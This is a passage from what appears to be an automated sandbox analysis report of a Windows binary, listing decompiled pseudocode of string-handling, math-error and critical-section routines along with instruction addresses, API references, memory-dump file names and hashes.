				_t238 = E01474F00(_t324);
				_t101 = _t291 + 0x38; // 0x38
				_t286 =  *0x14a4668; // 0x14ab360
				_v48 = _t101;
				_t193 =  *(_t238 + 0x1c) & 0x000000ff;
				if(_t193 == 1) {
					L37:
					_t239 = _v48;
					 *((intOrPtr*)(_t291 + 0x38)) =  *_t286;
					_t107 = _t286 + 4; // 0x36353433
					 *((intOrPtr*)(_t239 + 4)) =  *_t107;
					_t109 = _t286 + 7; // 0x39383736
					 *((intOrPtr*)(_t239 + 7)) =  *_t109;
				} else {
					if(_t193 == 0) {
						E013EF810(_t238);
						_t203 =  *((intOrPtr*)( *_t238 + 0x1c));
						__eflags = _t203 - 0x13efb90;
						if(_t203 == 0x13efb90) {
							goto L37;
						} else {
							goto L53;
						}
					} else {
						_t203 =  *((intOrPtr*)( *_t238 + 0x1c));
						if(_t203 != 0x13efb90) {
							L53:
							 *_t298 = _t286;
							_v100 = _v48;
							_t134 = _t286 + 0xb; // 0x14ab36b
							_v104 = _t134;
							 *_t203();
							_t298 = _t298 - 0xc;
						} else {
							goto L37;
						}
					}
				}
				goto L38;
			}

0x0145c1e5
0x0145c1e8
0x0145c1ee
0x0145c1f1
0x0145c1f6
0x0145c1fa
0x0145c202
0x0145c678
0x0145c67e
0x0145c680
0x0145c683
0x0145c208
0x0145c20b
0x0145c210
0x0145c215
0x0145c21f
0x0145c21f
0x0145c227
0x0145c22c
0x0145c22c
0x0145c22f
0x0145c232
0x0145c238
0x0145c23d
0x0145c243
0x0145c24b
0x0145c24f
0x0145c252
0x0145c257
0x0145c25c
0x0145c25f
0x0145c264
0x0145c525
0x0145c52a
0x0145c52c
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x0145c26a
0x0145c26d
0x0145c270
0x0145c275
0x0145c532
0x0145c538
0x0145c53b
0x0145c542
0x0145c545
0x0145c548
0x0145c54d
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x0145c27b
0x0145c27b
0x0145c27d
0x0145c285
0x0145c553
0x0145c553
0x0145c559
0x0145c55b
0x0145c55e
0x0145c28b
0x0145c28b
0x0145c28e
0x0145c293
0x0145c298
0x0145c2a2
0x0145c2a2
0x0145c2aa
0x0145c2af
0x0145c2af
0x0145c285
0x0145c275
0x0145c2b2
0x0145c2b5
0x0145c2bb
0x0145c2c0
0x0145c2c6
0x0145c2ce
0x0145c2d2
0x0145c2d5
0x0145c2da
0x0145c2df
0x0145c2e2
0x0145c2e7
0x0145c5f5
0x0145c5fa
0x0145c5fc
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x0145c2ed
0x0145c2f0
0x0145c2f3
0x0145c2f8
0x0145c602
0x0145c608
0x0145c60b
0x0145c612
0x0145c615
0x0145c618
0x0145c61d
0x00000000
0x00000000
0x00000000
0x00000000
0x0145c4f0
0x0145c4f0
0x0145c4f5
0x0145c4f8
0x0145c4fe
0x0145c570
0x0145c575
0x0145c57a
0x0145c57c
0x00000000
0x00000000
0x00000000
0x00000000
0x0145c500
0x0145c500
0x0145c503
0x0145c506
0x0145c50b
0x0145c57e
0x0145c581
0x0145c584
0x0145c596
0x0145c50d
0x0145c50d
0x0145c514
0x0145c514
0x0145c50b
0x00000000
0x0145c2fe
0x0145c2fe
0x0145c300
0x0145c308
0x0145c623
0x0145c623
0x0145c629
0x0145c62b
0x0145c62e
0x0145c30e
0x0145c30e
0x0145c311
0x0145c316
0x0145c31b
0x0145c325
0x0145c325
0x0145c32d
0x0145c332
0x0145c332
0x0145c308
0x0145c2f8
0x0145c335
0x0145c338
0x0145c33e
0x0145c343
0x0145c349
0x0145c351
0x0145c355
0x0145c358
0x0145c35d
0x0145c362
0x0145c365
0x0145c36a
0x0145c5a5
0x0145c5aa
0x0145c5ac
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x0145c370
0x0145c373
0x0145c376
0x0145c37b
0x0145c5b2
0x0145c5b8
0x0145c5bb
0x0145c5c2
0x0145c5c5
0x0145c5c8
0x0145c5cd
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x0145c381
0x0145c381
0x0145c383
0x0145c38b
0x0145c5d3
0x0145c5d3
0x0145c5d9
0x0145c5db
0x0145c5de
0x0145c391
0x0145c391
0x0145c394
0x0145c399
0x0145c39e
0x0145c3a8
0x0145c3a8
0x0145c3b0
0x0145c3b5
0x0145c3b5
0x0145c38b
0x0145c37b
0x0145c3b8
0x0145c3bb
0x0145c3be
0x0145c3c1
0x0145c3c6
0x0145c3d4
0x0145c3d6
0x0145c3d9
0x0145c3dd
0x0145c3e2
0x0145c3e5
0x0145c3e8
0x0145c3eb
0x0145c3ed
0x0145c3f2
0x0145c3fc
0x0145c3fc
0x0145c3ff
0x0145c404
0x0145c40c
0x0145c6d2
0x0145c412
0x0145c415
0x0145c415
0x0145c419
0x0145c41e
0x0145c426
0x0145c6c2
0x0145c42c
0x0145c42f
0x0145c42f
0x0145c433
0x0145c439
0x0145c43b
0x0145c441
0x0145c447
0x0145c44d
0x0145c453
0x0145c459
0x0145c45c
0x0145c464
0x0145c6b2
0x0145c6b4
0x0145c46a
0x0145c46d
0x0145c46d
0x0145c470
0x0145c473
0x0145c47b
0x0145c6a2
0x0145c481
0x0145c484
0x0145c484
0x0145c487
0x0145c48c
0x0145c48f
0x0145c494
0x0145c692
0x0145c49a
0x0145c49d
0x0145c49d
0x0145c4a0
0x0145c4a6
0x0145c4ae
0x0145c4b0
0x0145c4b3
0x0145c4b9
0x0145c4bc
0x0145c4c2
0x0145c4dc
0x0145c4de
0x0145c4e1
0x0145c4e4
0x0145c4e7
0x0145c4ea
0x0145c4ed
0x0145c4c4
0x0145c4c6
0x0145c642
0x0145c649
0x0145c64c
0x0145c651
0x00000000
0x00000000
0x00000000
0x00000000
0x0145c4cc
0x0145c4ce
0x0145c4d6
0x0145c657
0x0145c65c
0x0145c65f
0x0145c663
0x0145c666
0x0145c66a
0x0145c66c
0x00000000
0x00000000
0x00000000
0x0145c4d6
0x0145c4c6
0x00000000

APIs

strlen.MSVCRT ref: 0145C21A
strlen.MSVCRT ref: 0145C29D
strlen.MSVCRT ref: 0145C320
strlen.MSVCRT ref: 0145C3A3

Memory Dump Source

Source File: 00000000.00000002.240345679.00000000013C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013C0000, based on PE: true

Associated: 00000000.00000002.240342452.00000000013C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240433831.0000000001481000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240438442.0000000001482000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240507021.00000000014A5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240548728.00000000014F3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240554058.00000000014F6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240573033.000000000151A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_13c0000_N2wufLmC74.jbxd

Yara matches

Similarity

API ID: strlen
String ID:
API String ID: 39653677-0
Opcode ID: 9841143364db686bacdbad3019f4bb99661303fe539fa838f35dc7a2cae45899
Instruction ID: 16cf4d109efed9e4172344ec9b9c5736576cf079b83c065ed52dca6c678b9d5e
Opcode Fuzzy Hash: 9841143364db686bacdbad3019f4bb99661303fe539fa838f35dc7a2cae45899
Instruction Fuzzy Hash: 11E14A74A007068FCB50EF6CC0C496EFBF5BF98214B11866AE855DB366D734E946CB81

Uniqueness

Uniqueness Score: -1.00%

Function 0145B9E0 Relevance: 5.4, APIs: 4, Instructions: 352
stringCOMMON

Download Yara Rule

C-Code - Quality: 15%

			E0145B9E0(void* __ecx, void* __eflags, char _a4) {
				void* _v16;
				char _v32;
				char _v33;
				char _v34;
				char _v35;
				signed char* _v48;
				char _v52;
				signed char* _v56;
				char _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				signed char* _v72;
				signed char* _v88;
				void* _v92;
				void* _v96;
				signed char* _v100;
				void* _v104;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr* _t139;
				intOrPtr* _t141;
				char _t143;
				char _t144;
				intOrPtr _t146;
				intOrPtr* _t149;
				char _t151;
				signed char* _t152;
				intOrPtr _t154;
				intOrPtr* _t157;
				char _t159;
				char _t160;
				intOrPtr _t162;
				intOrPtr* _t165;
				char _t167;
				signed char* _t168;
				signed int _t170;
				intOrPtr* _t172;
				signed int _t173;
				intOrPtr* _t175;
				signed int _t176;
				intOrPtr* _t183;
				intOrPtr _t184;
				intOrPtr* _t185;
				intOrPtr _t186;
				intOrPtr* _t188;
				intOrPtr _t189;
				signed int _t193;
				intOrPtr _t197;
				char* _t198;
				intOrPtr* _t203;
				intOrPtr* _t237;
				intOrPtr* _t238;
				signed char* _t239;
				char _t243;
				char _t246;
				char _t249;
				char _t257;
				signed char* _t268;
				signed char* _t270;
				intOrPtr _t271;
				char* _t275;
				char* _t277;
				char* _t279;
				char* _t281;
				intOrPtr _t282;
				intOrPtr _t283;
				signed char* _t284;
				signed char* _t285;
				intOrPtr* _t286;
				char* _t287;
				char* _t288;
				char* _t289;
				char* _t290;
				void* _t291;
				void* _t292;
				void* _t293;
				void* _t294;
				void* _t295;
				void* _t296;
				signed char** _t297;
				intOrPtr* _t298;

				_t291 = __ecx;
				_t294 = _t293 - 0x4c;
				_v92 = _a4;
				_t139 = E01474CC0(__eflags);
				_t237 = _t139;
				_t141 =  *((intOrPtr*)( *_t139 + 0x14));
				if(_t141 != E013EABF0) {
					_v92 = _t237;
					 *_t141();
					_t143 = _v32;
					_t294 = _t294 - 4;
				} else {
					_t281 = 0xffffffff;
					_t290 =  *( *((intOrPtr*)(_t237 + 8)) + 0x14);
					if(_t290 != 0) {
						_t281 =  &(_t290[strlen(_t290)]);
					}
					_t143 = E01438A70(_t290, _t237,  &_v33, _t281, _t290, _t291, _t292);
					_v32 = _t143;
				}
				_t282 =  *((intOrPtr*)(_t143 - 0xc));
				_v64 = _t282;
				_t144 = L01477930(_t282);
				_v52 = _t144;
				_v88 = 0;
				_v92 = _t282;
				_v96 = _t144;
				E013EA140(_t237,  &_v32);
				_t146 =  *0x14a31d0; // 0x2
				_t243 = _v32;
				_t295 = _t294 - 0xc;
				if(_t146 != 0) {
					asm("lock xadd [ecx-0x4], eax");
					__eflags = 0xffffffff;
					if(0xffffffff > 0) {
						goto L6;
					} else {
						goto L42;
					}
					goto L60;
				} else {
					_t16 =  *((intOrPtr*)(_t243 - 4)) - 1; // -1
					 *((intOrPtr*)(_t243 - 4)) = _t16;
					if( *((intOrPtr*)(_t243 - 4)) <= 0) {
						L42:
						_v96 =  &_v33;
						E01438FD0( &_v33, _t243 - 0xc);
						_t295 = _t295 - 4;
						_t149 =  *((intOrPtr*)( *_t237 + 0x18));
						__eflags = _t149 - E013EAC90;
						if(_t149 == E013EAC90) {
							goto L7;
						} else {
							goto L43;
						}
						L60:
					} else {
						L6:
						_t149 =  *((intOrPtr*)( *_t237 + 0x18));
						if(_t149 != E013EAC90) {
							L43:
							_v96 = _t237;
							 *_t149();
							_t151 = _v32;
							_t295 = _t295 - 4;
						} else {
							L7:
							_t279 = 0xffffffff;
							_t289 =  *( *((intOrPtr*)(_t237 + 8)) + 0x1c);
							if(_t289 != 0) {
								_t279 =  &(_t289[strlen(_t289)]);
							}
							_t151 = E01438A70(_t289, _t237,  &_v35, _t279, _t289, _t291, _t292);
							_v32 = _t151;
						}
					}
				}
				_t283 =  *((intOrPtr*)(_t151 - 0xc));
				_v68 = _t283;
				_t152 = L01477930(_t283);
				_v56 = _t152;
				_v92 = 0;
				_v96 = _t283;
				_v100 = _t152;
				E013EA140(_t237,  &_v32);
				_t154 =  *0x14a31d0; // 0x2
				_t246 = _v32;
				_t296 = _t295 - 0xc;
				if(_t154 != 0) {
					asm("lock xadd [ecx-0x4], eax");
					__eflags = 0xffffffff;
					if(0xffffffff > 0) {
						goto L12;
					} else {
						goto L50;
					}
					goto L38;
				} else {
					_t32 =  *((intOrPtr*)(_t246 - 4)) - 1; // -1
					 *((intOrPtr*)(_t246 - 4)) = _t32;
					if( *((intOrPtr*)(_t246 - 4)) <= 0) {
						L50:
						_v100 =  &_v33;
						E01438FD0( &_v33, _t246 - 0xc);
						_t296 = _t296 - 4;
						_t157 =  *((intOrPtr*)( *_t237 + 0x1c));
						__eflags = _t157 - E013EAC50;
						if(_t157 == E013EAC50) {
							goto L13;
						} else {
							goto L51;
						}
						L38:
						_t197 =  *0x14a31d0; // 0x2
						_t257 = _v32;
						 *((char*)(_t291 + 0x43)) = 1;
						if(_t197 != 0) {
							_t198 = 0xffffffff;
							asm("lock xadd [ecx-0x4], eax");
							__eflags = 0xffffffff;
							if(0xffffffff > 0) {
								goto L40;
							} else {
								goto L45;
							}
						} else {
							_t198 =  *(_t257 - 4);
							_t114 = _t198 - 1; // -1
							 *(_t257 - 4) = _t114;
							if(_t198 <= 0) {
								L45:
								__eflags = _t257 - 0xc;
								 *_t298 =  &_v33;
								return E01438FD0( &_v33, _t257 - 0xc);
							} else {
								L40:
								return _t198;
							}
						}
						goto L60;
					} else {
						L12:
						_t157 =  *((intOrPtr*)( *_t237 + 0x1c));
						if(_t157 != E013EAC50) {
							L51:
							_v100 = _t237;
							 *_t157();
							_t159 = _v32;
							_t296 = _t296 - 4;
						} else {
							L13:
							_t277 = 0xffffffff;
							_t288 =  *( *((intOrPtr*)(_t237 + 8)) + 0x24);
							if(_t288 != 0) {
								_t277 =  &(_t288[strlen(_t288)]);
							}
							_t159 = E01438A70(_t288, _t237,  &_v34, _t277, _t288, _t291, _t292);
							_v32 = _t159;
						}
					}
				}
				_t284 =  *((intOrPtr*)(_t159 - 0xc));
				_v72 = _t284;
				_t160 = L01477930(_t284);
				_v60 = _t160;
				_v96 = 0;
				_v100 = _t284;
				_v104 = _t160;
				E013EA140(_t237,  &_v32);
				_t162 =  *0x14a31d0; // 0x2
				_t249 = _v32;
				_t297 = _t296 - 0xc;
				if(_t162 != 0) {
					asm("lock xadd [ecx-0x4], eax");
					__eflags = 0xffffffff;
					if(0xffffffff > 0) {
						goto L18;
					} else {
						goto L47;
					}
					goto L60;
				} else {
					_t48 =  *((intOrPtr*)(_t249 - 4)) - 1; // -1
					 *((intOrPtr*)(_t249 - 4)) = _t48;
					if( *((intOrPtr*)(_t249 - 4)) <= 0) {
						L47:
						_v104 =  &_v33;
						E01438FD0( &_v33, _t249 - 0xc);
						_t297 = _t297 - 4;
						_t165 =  *((intOrPtr*)( *_t237 + 0x10));
						__eflags = _t165 - E013EAA50;
						if(_t165 == E013EAA50) {
							goto L19;
						} else {
							goto L48;
						}
						goto L60;
					} else {
						L18:
						_t165 =  *((intOrPtr*)( *_t237 + 0x10));
						if(_t165 != E013EAA50) {
							L48:
							_v104 = _t237;
							 *_t165();
							_t167 = _v32;
							_t297 = _t297 - 4;
						} else {
							L19:
							_t275 = 0xffffffff;
							_t287 =  *( *((intOrPtr*)(_t237 + 8)) + 8);
							if(_t287 != 0) {
								_t275 =  &(_t287[strlen(_t287)]);
							}
							_t167 = E01438A70(_t287, _t237,  &_v33, _t275, _t287, _t291, _t292);
							_v32 = _t167;
						}
					}
				}
				_t268 =  *(_t167 - 0xc);
				_v48 = _t268;
				 *_t297 = _t268;
				_t168 = L01477930();
				_v100 = 0;
				_t285 = _t168;
				 *_t297 = _t168;
				_v104 = _v48;
				E013EA140(_t237,  &_v32);
				_t270 = _v48;
				 *(_t291 + 8) = _t285;
				_t298 = _t297 - 0xc;
				_t170 = 0;
				 *((intOrPtr*)(_t291 + 0xc)) = _t270;
				if(_t270 != 0) {
					_t170 = ( *_t285 & 0x000000ff) - 0x00000001 & 0xffffff00 | ( *_t285 & 0x000000ff) - 0x00000001 - 0x0000007d < 0x00000000;
				}
				 *(_t291 + 0x10) = _t170;
				_t172 =  *((intOrPtr*)( *_t237 + 8));
				if(_t172 != E013EAC40) {
					_t173 =  *_t172();
				} else {
					_t173 =  *( *((intOrPtr*)(_t237 + 8)) + 0x11) & 0x000000ff;
				}
				 *(_t291 + 0x11) = _t173;
				_t175 =  *((intOrPtr*)( *_t237 + 0xc));
				if(_t175 != E013EACD0) {
					_t176 =  *_t175();
				} else {
					_t176 =  *( *((intOrPtr*)(_t237 + 8)) + 0x12) & 0x000000ff;
				}
				 *(_t291 + 0x12) = _t176;
				_t271 =  *_t237;
				 *((intOrPtr*)(_t291 + 0x14)) = _v52;
				 *((intOrPtr*)(_t291 + 0x18)) = _v64;
				 *((intOrPtr*)(_t291 + 0x1c)) = _v56;
				 *((intOrPtr*)(_t291 + 0x20)) = _v68;
				 *((intOrPtr*)(_t291 + 0x24)) = _v60;
				 *((intOrPtr*)(_t291 + 0x28)) = _v72;
				_t183 =  *((intOrPtr*)(_t271 + 0x20));
				if(_t183 != E013EAC30) {
					_t184 =  *_t183();
					_t271 =  *_t237;
				} else {
					_t184 =  *((intOrPtr*)( *((intOrPtr*)(_t237 + 8)) + 0x2c));
				}
				 *((intOrPtr*)(_t291 + 0x2c)) = _t184;
				_t185 =  *((intOrPtr*)(_t271 + 0x24));
				if(_t185 != E013EAAE0) {
					_t186 =  *_t185();
				} else {
					_t186 =  *((intOrPtr*)( *((intOrPtr*)(_t237 + 8)) + 0x30));
				}
				 *((intOrPtr*)(_t291 + 0x30)) = _t186;
				_t188 =  *((intOrPtr*)( *_t237 + 0x28));
				_t324 = _t188 - E013EAAD0;
				if(_t188 != E013EAAD0) {
					_t189 =  *_t188();
				} else {
					_t189 =  *((intOrPtr*)( *((intOrPtr*)(_t237 + 8)) + 0x34));
				}
				 *((intOrPtr*)(_t291 + 0x34)) = _t189;
				 *_t298 = _a4;
				_t238 = E01474F00(_t324);
				_t101 = _t291 + 0x38; // 0x38
				_t286 =  *0x14a4668; // 0x14ab360
				_v48 = _t101;
				_t193 =  *(_t238 + 0x1c) & 0x000000ff;
				if(_t193 == 1) {
					L37:
					_t239 = _v48;
					 *((intOrPtr*)(_t291 + 0x38)) =  *_t286;
					_t107 = _t286 + 4; // 0x36353433
					 *((intOrPtr*)(_t239 + 4)) =  *_t107;
					_t109 = _t286 + 7; // 0x39383736
					 *((intOrPtr*)(_t239 + 7)) =  *_t109;
				} else {
					if(_t193 == 0) {
						E013EF810(_t238);
						_t203 =  *((intOrPtr*)( *_t238 + 0x1c));
						__eflags = _t203 - 0x13efb90;
						if(_t203 == 0x13efb90) {
							goto L37;
						} else {
							goto L53;
						}
					} else {
						_t203 =  *((intOrPtr*)( *_t238 + 0x1c));
						if(_t203 != 0x13efb90) {
							L53:
							 *_t298 = _t286;
							_v100 = _v48;
							_t134 = _t286 + 0xb; // 0x14ab36b
							_v104 = _t134;
							 *_t203();
							_t298 = _t298 - 0xc;
						} else {
							goto L37;
						}
					}
				}
				goto L38;
			}

0x0145b9e5
0x0145b9e8
0x0145b9ee
0x0145b9f1
0x0145b9f6
0x0145b9fa
0x0145ba02
0x0145be78
0x0145be7e
0x0145be80
0x0145be83
0x0145ba08
0x0145ba0b
0x0145ba10
0x0145ba15
0x0145ba1f
0x0145ba1f
0x0145ba27
0x0145ba2c
0x0145ba2c
0x0145ba2f
0x0145ba32
0x0145ba38
0x0145ba3d
0x0145ba43
0x0145ba4b
0x0145ba4f
0x0145ba52
0x0145ba57
0x0145ba5c
0x0145ba5f
0x0145ba64
0x0145bd25
0x0145bd2a
0x0145bd2c
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x0145ba6a
0x0145ba6d
0x0145ba70
0x0145ba75
0x0145bd32
0x0145bd38
0x0145bd3b
0x0145bd42
0x0145bd45
0x0145bd48
0x0145bd4d
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x0145ba7b
0x0145ba7b
0x0145ba7d
0x0145ba85
0x0145bd53
0x0145bd53
0x0145bd59
0x0145bd5b
0x0145bd5e
0x0145ba8b
0x0145ba8b
0x0145ba8e
0x0145ba93
0x0145ba98
0x0145baa2
0x0145baa2
0x0145baaa
0x0145baaf
0x0145baaf
0x0145ba85
0x0145ba75
0x0145bab2
0x0145bab5
0x0145babb
0x0145bac0
0x0145bac6
0x0145bace
0x0145bad2
0x0145bad5
0x0145bada
0x0145badf
0x0145bae2
0x0145bae7
0x0145bdf5
0x0145bdfa
0x0145bdfc
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x0145baed
0x0145baf0
0x0145baf3
0x0145baf8
0x0145be02
0x0145be08
0x0145be0b
0x0145be12
0x0145be15
0x0145be18
0x0145be1d
0x00000000
0x00000000
0x00000000
0x00000000
0x0145bcf0
0x0145bcf0
0x0145bcf5
0x0145bcf8
0x0145bcfe
0x0145bd70
0x0145bd75
0x0145bd7a
0x0145bd7c
0x00000000
0x00000000
0x00000000
0x00000000
0x0145bd00
0x0145bd00
0x0145bd03
0x0145bd06
0x0145bd0b
0x0145bd7e
0x0145bd81
0x0145bd84
0x0145bd96
0x0145bd0d
0x0145bd0d
0x0145bd14
0x0145bd14
0x0145bd0b
0x00000000
0x0145bafe
0x0145bafe
0x0145bb00
0x0145bb08
0x0145be23
0x0145be23
0x0145be29
0x0145be2b
0x0145be2e
0x0145bb0e
0x0145bb0e
0x0145bb11
0x0145bb16
0x0145bb1b
0x0145bb25
0x0145bb25
0x0145bb2d
0x0145bb32
0x0145bb32
0x0145bb08
0x0145baf8
0x0145bb35
0x0145bb38
0x0145bb3e
0x0145bb43
0x0145bb49
0x0145bb51
0x0145bb55
0x0145bb58
0x0145bb5d
0x0145bb62
0x0145bb65
0x0145bb6a
0x0145bda5
0x0145bdaa
0x0145bdac
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x0145bb70
0x0145bb73
0x0145bb76
0x0145bb7b
0x0145bdb2
0x0145bdb8
0x0145bdbb
0x0145bdc2
0x0145bdc5
0x0145bdc8
0x0145bdcd
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x0145bb81
0x0145bb81
0x0145bb83
0x0145bb8b
0x0145bdd3
0x0145bdd3
0x0145bdd9
0x0145bddb
0x0145bdde
0x0145bb91
0x0145bb91
0x0145bb94
0x0145bb99
0x0145bb9e
0x0145bba8
0x0145bba8
0x0145bbb0
0x0145bbb5
0x0145bbb5
0x0145bb8b
0x0145bb7b
0x0145bbb8
0x0145bbbb
0x0145bbbe
0x0145bbc1
0x0145bbc6
0x0145bbd4
0x0145bbd6
0x0145bbd9
0x0145bbdd
0x0145bbe2
0x0145bbe5
0x0145bbe8
0x0145bbeb
0x0145bbed
0x0145bbf2
0x0145bbfc
0x0145bbfc
0x0145bbff
0x0145bc04
0x0145bc0c
0x0145bed2
0x0145bc12
0x0145bc15
0x0145bc15
0x0145bc19
0x0145bc1e
0x0145bc26
0x0145bec2
0x0145bc2c
0x0145bc2f
0x0145bc2f
0x0145bc33
0x0145bc39
0x0145bc3b
0x0145bc41
0x0145bc47
0x0145bc4d
0x0145bc53
0x0145bc59
0x0145bc5c
0x0145bc64
0x0145beb2
0x0145beb4
0x0145bc6a
0x0145bc6d
0x0145bc6d
0x0145bc70
0x0145bc73
0x0145bc7b
0x0145bea2
0x0145bc81
0x0145bc84
0x0145bc84
0x0145bc87
0x0145bc8c
0x0145bc8f
0x0145bc94
0x0145be92
0x0145bc9a
0x0145bc9d
0x0145bc9d
0x0145bca0
0x0145bca6
0x0145bcae
0x0145bcb0
0x0145bcb3
0x0145bcb9
0x0145bcbc
0x0145bcc2
0x0145bcdc
0x0145bcde
0x0145bce1
0x0145bce4
0x0145bce7
0x0145bcea
0x0145bced
0x0145bcc4
0x0145bcc6
0x0145be42
0x0145be49
0x0145be4c
0x0145be51
0x00000000
0x00000000
0x00000000
0x00000000
0x0145bccc
0x0145bcce
0x0145bcd6
0x0145be57
0x0145be5c
0x0145be5f
0x0145be63
0x0145be66
0x0145be6a
0x0145be6c
0x00000000
0x00000000
0x00000000
0x0145bcd6
0x0145bcc6
0x00000000

APIs

strlen.MSVCRT ref: 0145BA1A
strlen.MSVCRT ref: 0145BA9D
strlen.MSVCRT ref: 0145BB20
strlen.MSVCRT ref: 0145BBA3

Memory Dump Source

Source File: 00000000.00000002.240345679.00000000013C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013C0000, based on PE: true

Associated: 00000000.00000002.240342452.00000000013C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240433831.0000000001481000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240438442.0000000001482000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240507021.00000000014A5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240548728.00000000014F3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240554058.00000000014F6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240573033.000000000151A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_13c0000_N2wufLmC74.jbxd

Yara matches

Similarity

API ID: strlen
String ID:
API String ID: 39653677-0
Opcode ID: 6341d4d7407b19c5ac98fac3ca0a174376e5de98d14dc1e6e0a6b362a9a9e144
Instruction ID: 5af60de08384894af3f404abd100c3d593f7a511820ad2770145059564e07424
Opcode Fuzzy Hash: 6341d4d7407b19c5ac98fac3ca0a174376e5de98d14dc1e6e0a6b362a9a9e144
Instruction Fuzzy Hash: F8E11974A007068FCB51EF6DC08496EFBF2FF98210B15866AE855CB366D734E946CB81

Uniqueness

Uniqueness Score: -1.00%

Function 013D5410 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 35COMMON

Download Yara Rule

APIs

fprintf.MSVCRT ref: 013D547E

Strings

_matherr(): %s in %s(%g, %g) (retval=%g), xrefs: 013D545F
Unknown error, xrefs: 013D5412

Memory Dump Source

Source File: 00000000.00000002.240345679.00000000013C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013C0000, based on PE: true

Associated: 00000000.00000002.240342452.00000000013C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240433831.0000000001481000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240438442.0000000001482000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240507021.00000000014A5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240548728.00000000014F3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240554058.00000000014F6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240573033.000000000151A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_13c0000_N2wufLmC74.jbxd

Yara matches

Similarity

API ID: fprintf
String ID: Unknown error$_matherr(): %s in %s(%g, %g) (retval=%g)
API String ID: 383729395-3474627141
Opcode ID: ba426bcc173888486a41e0bc6cc7a40070d8ce41fb869d5ed303bc3df87b66c4
Instruction ID: 95ff001cf814060e2da554686cf43685955d155dfc4b659a603719300f0494a7
Opcode Fuzzy Hash: ba426bcc173888486a41e0bc6cc7a40070d8ce41fb869d5ed303bc3df87b66c4
Instruction Fuzzy Hash: A801DDB1408B55CBD740AF15E4C841ABFF1FF99254F868889E5D847269CB32D8B8CB43

Uniqueness

Uniqueness Score: -1.00%

Function 013E2BC0 Relevance: 5.1, APIs: 4, Instructions: 55sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(?,?,?,?,013E2CE1,?,?,?,?,-00000001,?,?,013E36AB), ref: 013E2BE7
InitializeCriticalSection.KERNEL32(?,?,?,?,013E2CE1,?,?,?,?,-00000001,?,?,013E36AB), ref: 013E2C1D
InitializeCriticalSection.KERNEL32(?,?,?,?,?,013E2CE1,?,?,?,?,-00000001,?,?,013E36AB), ref: 013E2C29
EnterCriticalSection.KERNEL32(?,?,?,?,013E2CE1,?,?,?,?,-00000001,?,?,013E36AB), ref: 013E2C51

Memory Dump Source

Source File: 00000000.00000002.240345679.00000000013C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013C0000, based on PE: true

Associated: 00000000.00000002.240342452.00000000013C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240433831.0000000001481000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240438442.0000000001482000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240507021.00000000014A5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240548728.00000000014F3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240554058.00000000014F6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240573033.000000000151A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_13c0000_N2wufLmC74.jbxd

Yara matches

Similarity

API ID: CriticalSection$Initialize$EnterSleep
String ID:
API String ID: 1117354567-0
Opcode ID: ca62d87a5e678f2dd6e3fe6e55010a2ac1ed2d4c5de5074232493d8ff6ed9b7c
Instruction ID: 0b65cb254076e081db56c222758822275e9c93c3007fe1b57c6d8af206dd6cea
Opcode Fuzzy Hash: ca62d87a5e678f2dd6e3fe6e55010a2ac1ed2d4c5de5074232493d8ff6ed9b7c
Instruction Fuzzy Hash: 2B1121B08046158EEB35AF6CF88951B7AE8F704208F55045DC58286775D6B1D4E8C792

Uniqueness

Uniqueness Score: -1.00%

